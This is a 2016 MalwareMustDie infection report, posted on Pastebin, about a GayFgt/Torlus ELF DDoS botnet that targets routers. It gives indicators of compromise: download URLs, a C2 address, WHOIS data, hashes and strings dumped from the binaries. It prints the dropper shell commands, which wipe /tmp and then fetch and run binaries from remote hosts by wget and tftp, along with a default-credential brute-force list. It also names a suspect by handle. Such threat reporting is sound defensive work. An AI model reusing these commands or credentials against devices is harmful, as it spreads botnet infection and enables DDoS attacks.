SHARE
TWEET

Malware ELF DDOS Botnet Torlus/GayFgt Infection Report

MalwareMustDie Feb 27th, 2016 (edited) 379 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.    _____         .__                                  _____                  __ _______  .__        
  2.   /     \ _____  |  |__  _  _______ _______   ____   /     \  __ __  _______/  |\____ \ |__| ____  
  3.  /  \ /  \\__  \ |  |\ \/ \/ /\__  \\_  __ \_/ __ \ /  \ /  \|  |  \/  ___/\   __\  |  \|  |/ __ \
  4. /    Y    \/ __ \|  |_\     /  / __ \|  | \/\  ___//    Y    \  |  /\___ \  |  | |  `   \  \  ___/
  5. \____|__  (____  /____/\/\_/  (____  /__|    \___  >____|__  /____//____  > |__|/__ __  /__|\___  >
  6.         \/     \/                  \/            \/        \/           \/             \/        \/
  7. #MalwareMustDie :: malwaremustdie.org
  8.  
  9. ###############################
  10. # 0x01. Cyber crime Suspect
  11. ###############################
  12.  
  13.   Handle: AntiChrist/Reverse/NoHacker/etc.. | Origin: Noord Netherlands
  14.   Verdict: Hack routers for ELF malware backddor for DDOS attack & etc malicious purpose
  15.            a Lizard Squad loonies, and administrator of lizard stresser service.
  16.            PoC: https://pastebin.com/raw/nweQVfN6
  17.   Profile:
  18.   http://malwaremustdie.org/stat/antichrist.html
  19.  
  20. ###############################
  21. # 0x02. Report details
  22. ###############################
  23.  
  24.    New malware infrastructure in Moldova & Lithuania
  25.    Malware variant: ELF Botnet Torlus/GayFgt/Lizard Kebab multi architecture.
  26.    Malware / incident reference: MMD-0052-2016 - SkidDDOS ELF infection
  27.    http://blog.malwaremustdie.org/2016/02/mmd-0052-2016-skidddos-elf-distribution.html
  28.  
  29. #### ELF INFECTION #######
  30.  
  31. // infection:
  32. http://new.updatebits.su/get.sh (185.130.5.179)
  33. // updates1:
  34. http://new.updatebits.su/cfw.sh (185.130.5.179)
  35. // updates2
  36. cf.updatebits.su (208.67.1.66)
  37.  
  38. //CNC:
  39. 176.123.7.70:168
  40. hostname: 176-123-7-70.alexhost.md (176.123.7.70)
  41. Connection to 176.123.7.70 168 port [tcp/] succeeded!
  42.  
  43. // domain:
  44. domain:        UPDATEBITS.SU
  45. nserver:       amy.ns.cloudflare.com.
  46. nserver:       art.ns.cloudflare.com.
  47. state:         REGISTERED, DELEGATED
  48. person:        Private Person
  49. e-mail:        zefknot@gmx.com
  50. registrar:     R01-REG-FID
  51. created:       2015.11.28
  52. paid-till:     2016.11.28
  53. free-date:     2016.12.31
  54. source:        TCI
  55.  
  56. #### PAYLOAD SERVER #######
  57.  
  58. HTTP/1.1 200 OK
  59. Date: Sat, 27 Feb 2016 13:28:25 GMT
  60. Server: Apache/2.2.15 (CentOS)
  61. Last-Modified: Fri, 26 Feb 2016 22:13:32 GMT
  62. ETag: "14202b6-703-52cb39c0a08f2"
  63. 200 OK
  64.  
  65. #### LOCATION ######
  66.  
  67. {
  68.   "ip": "185.130.5.179",
  69.   "hostname": "new.updatebits.su",
  70.   "city": "",
  71.   "region": "",
  72.   "country": "LT",
  73.   "loc": "56.0000,24.0000",
  74.   "org": "AS60117 Host Sailor Ltd."
  75.  
  76.   "ip": "176.123.7.70",
  77.   "hostname": "176-123-7-70.alexhost.md",
  78.   "city": "Chisinau",
  79.   "region": "Municipiul Chisinau",
  80.   "country": "MD",
  81.   "loc": "47.0056,28.8575",
  82.   "org": "AS200019 ALEXHOST SRL"
  83.  
  84.   "ip": "208.67.1.66",
  85.   "hostname": "cf.updatebits.su",
  86.   "city": "Kansas City",
  87.   "region": "Missouri",
  88.   "country": "US",
  89.   "loc": "39.1472,-94.5735",
  90.   "org": "AS33387 DataShack, LC",
  91.   "postal": "64116"
  92. }
  93.  
  94. #### PAYLOADS #######
  95.  
  96. -------------------
  97. ulimit -n 712
  98. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d11 || wget http://185.130.5.179/d11;cat d11 >busybox;chmod 777 busybox;./busybox
  99. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d8 || wget http://185.130.5.179/d8;cat d8 >busybox;chmod 777 busybox;./busybox
  100. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d7 || wget http://185.130.5.179/d7;cat d7 >busybox;chmod 777 busybox;./busybox
  101. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d1 || wget http://185.130.5.179/d1;cat d1 >busybox;chmod 777 busybox;./busybox
  102. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d2 || wget http://185.130.5.179/d2;cat d2 >busybox;chmod 777 busybox;./busybox
  103. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d3 || wget http://185.130.5.179/d3;cat d3 >busybox;chmod 777 busybox;./busybox
  104. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d4 || wget http://185.130.5.179/d4;cat d4 >busybox;chmod 777 busybox;./busybox
  105. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d5 || wget http://185.130.5.179/d5;cat d5 >busybox;chmod 777 busybox;./busybox
  106. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d6 || wget http://185.130.5.179/d6;cat d6 >busybox;chmod 777 busybox;./busybox
  107. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d9 || wget http://185.130.5.179/d9;cat d9 >busybox;chmod 777 busybox;./busybox
  108. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d10 || wget http://185.130.5.179/d10;cat d10 >busybox;chmod 777 busybox;./busybox
  109. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d12 || wget http://185.130.5.179/d12;cat d12 >busybox;chmod 777 busybox;./busybox
  110. rm -rf /tmp/1
  111. rm -rf /var/run/
  112.  
  113. #### BINS #######
  114.  
  115. --------------------
  116. d1: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
  117. d10:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
  118. d11:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
  119. d12:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
  120. d2: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
  121. d3: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
  122. d4: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
  123. d5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
  124. d6: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, not stripped
  125. d7: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
  126. d8: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
  127. d9: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
  128.  
  129. #### HASHES #######
  130.  
  131. --------------------
  132. SHA1 (d1) = 7d23b5292db6f928da4e357194d83466ef177a31
  133. SHA1 (d10) = 09e1fecc42b9d95a5b72209b8c44656aac15133e
  134. SHA1 (d11) = 691f1848297cf2b79d8e7936fb57915243ff30a5
  135. SHA1 (d12) = b09c71710132975ebc3d5ece042664f99f270238
  136. SHA1 (d2) = 26eedb2f6d7a0794b4ed264f8185439421892c0a
  137. SHA1 (d3) = 2b1511cd39a5f5540608713a617fe0496e8cbc18
  138. SHA1 (d4) = 577ac74c5e28d73ab5738b1d039d2be6d9fab649
  139. SHA1 (d5) = e6cbd349bed899005824f63e7232b70111c73b63
  140. SHA1 (d6) = 047db9b9ea6e69511f7353e263518ed8c18a6168
  141. SHA1 (d7) = 506b499efcd2436e7863de7ce6e6aa1f62537a71
  142. SHA1 (d8) = 2c6863d79808801623bfd3bcce216c023004397d
  143. SHA1 (d9) = 4249e6fd28ee2838759f1621f4c1bd79a4b1dec2
  144.  
  145. #### SNIPS #######
  146.  
  147. --------------------
  148. .rodata:0x0805CD40  176.123.7.70:168
  149. .rodata:0x0805CD51  root
  150. .rodata:0x0805CD57  admin
  151. .rodata:0x0805CD5E  user
  152. .rodata:0x0805CD64  login
  153. .rodata:0x0805CD6B  guest
  154. .rodata:0x0805CD72  support
  155. .rodata:0x0805CD7B  cisco
  156. .rodata:0x0805CD82  toor
  157. .rodata:0x0805CD88  changeme
  158. .rodata:0x0805CD92  1234
  159. .rodata:0x0805CD98  12345
  160. .rodata:0x0805CD9F  123456
  161. .rodata:0x0805CDA7  default
  162. .rodata:0x0805CDB0  pass
  163. .rodata:0x0805CDB6  password
  164. .rodata:0x0805CDC0  vizxv
  165. .rodata:0x0805CDC7  (null)
  166. .rodata:0x0805CDCE  buf: %s\n
  167. .rodata:0x0805CDD7  -c
  168. .rodata:0x0805CDDA  sh
  169. .rodata:0x0805CDDD  /bin/sh
  170. .rodata:0x0805D200  /proc/cpuinfo
  171. .rodata:0x0805D20E  BOGOMIPS
  172. .rodata:0x0805D217  PING
  173. .rodata:0x0805D21C  :>%$#
  174. .rodata:0x0805D223  %d.%d.%d.%d
  175. .rodata:0x0805D22F  %d.%d.%d.0
  176. .rodata:0x0805D23A  ogin:
  177. .rodata:0x0805D240  \r\n
  178. .rodata:0x0805D243  assword:
  179. .rodata:0x0805D24C  ncorrect
  180. .rodata:0x0805D255  sh\r\n
  181. .rodata:0x0805D25A  shell\r\n
  182. .rodata:0x0805D264  cd /tmp || cd /var/run; rm -rf *; busybox wget http://new.updatebits.su/cfw.sh || wget http://new.updatebits.su/cfw.sh; sh cfw.sh; rm -rf cfw.sh; busybox tftp -r tft.sh -g cf.updatebits.su || tftp -r tft.sh -g cf.updatebits.su; sh tft.sh; rm -rf tft.sh\r\n
  183. .rodata:0x0805D364  /bin/busybox;echo -e 'gayfgt'\r\n
  184. .rodata:0x0805D384  ulti-call
  185. .rodata:0x0805D38E  REPORT %s:%s:%s
  186. .rodata:0x0805D39E  gayfgt
  187. .rodata:0x0805D3D8  Failed opening raw socket.
  188. .rodata:0x0805D3F4  Failed setting raw headers mode.
  189. .rodata:0x0805D415  all
  190. .rodata:0x0805D41B  syn
  191. .rodata:0x0805D41F  rst
  192. .rodata:0x0805D423  fin
  193. .rodata:0x0805D427  ack
  194. .rodata:0x0805D42B  psh
  195. .rodata:0x0805D42F  Invalid flag \”%s\”
  196. .rodata:0x0805D441  PONG!
  197. .rodata:0x0805D447  GETLOCALIP
  198. .rodata:0x0805D452  My IP: %s
  199. .rodata:0x0805D45C  SCANNER
  200. .rodata:0x0805D464  SCANNER ON | OFF
  201. .rodata:0x0805D475  OFF
  202. .rodata:0x0805D479  ON
  203. .rodata:0x0805D47C  FORK
  204. .rodata:0x0805D481  HOLD
  205. .rodata:0x0805D486  JUNK
  206. .rodata:0x0805D48B  UDP
  207. .rodata:0x0805D48F  TCP
  208. .rodata:0x0805D493  KILLATTK
  209. .rodata:0x0805D49C  Killed %d.
  210. .rodata:0x0805D4A7  None Killed.
  211. .rodata:0x0805D4B4  LOLNOGTFO
  212. .rodata:0x0805D4BE  8.8.8.8
  213. .rodata:0x0805D4C6  /proc/net/route
  214. .rodata:0x0805D4D6  \t00000000\t
  215. .rodata:0x0805D4E1  [cpuset]
  216. .rodata:0x0805D4EA  fork failed\n
  217. .rodata:0x0805D4F9  FAILED TO CONNECT
  218. .rodata:0x0805D50B  PONG
  219. .rodata:0x0805D510  DUP
  220. .rodata:0x0805D514  SH
  221. .rodata:0x0805D517  %s 2>&1
  222. .rodata:0x0805D523  LINK CLOSED
  223. .rodata:0x0805D564  0.9.30
  224. .rodata:0x0805DBC8  -c
  225. .rodata:0x0805DBCB  /bin/sh
  226. .rodata:0x0805DE2C  /dev/null
  227. .rodata:0x0805DE74  clntudp_create: out of memory\n
  228. .rodata:0x0805DEE0  bad auth_len gid %d str %d auth %d\n
  229. .rodata:0x0805DF04  xdr_string: out of memory\n
  230. .rodata:0x0805DF1F  xdr_bytes: out of memory\n
  231. .rodata:0x0805DF68  (nil)
  232. .rodata:0x0805DF6E  (null)
  233. .rodata:0x0805DFC5  npxXoudifFeEgGaACScs
  234. .rodata:0x0805EB90  __get_myaddress: socket
  235. .rodata:0x0805EBA8  __get_myaddress: ioctl (get interface configuration)
  236. .rodata:0x0805EBDD  __get_myaddress: ioctl
  237. .rodata:0x0805EBF4  Cannot register service
  238. .rodata:0x0805EC1C  xdr_array: out of memory\n
  239. .rodata:0x0805EC38  /etc/resolv.conf
  240. .rodata:0x0805EC49  /etc/config/resolv.conf
  241. .rodata:0x0805EC61  nameserver
  242. .rodata:0x0805EC6C  domain
  243. .rodata:0x0805EC73  search
  244. .rodata:0x0805EC7A  %s%s%m\n
  245. .rodata:0x0805ED5C  RPC: (unknown error code)
  246. .rodata:0x0805ED76  %s:
  247. .rodata:0x0805ED7F  ; errno = %s
  248. .rodata:0x0805ED8C  ; low version = %lu, high version = %lu
  249. .rodata:0x0805EDB4  ; why =
  250. .rodata:0x0805EDBD  (unknown authentication error - %d)
  251. .rodata:0x0805EDE1  ; s1 = %lu, s2 = %lu
  252. .rodata:0x0805F1D4  %x
  253. .rodata:0x0805F1D7  0123456789abcdef
  254. .rodata:0x0805F1E8  /etc/hosts
  255. .rodata:0x0805F1F3  /etc/config/hosts
  256.  
  257. ###############################
  258. # 0x03. Contact us for more information
  259. ###############################
  260.  
  261. Twitter: @malwaremustdie (Direct Message)
  262.          warning: your IP/location will be scanned & conversation is recorded
  263.          Come clean & stay safe!
  264.  
  265. #MalwareMustDie!
  266. [EOF]
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top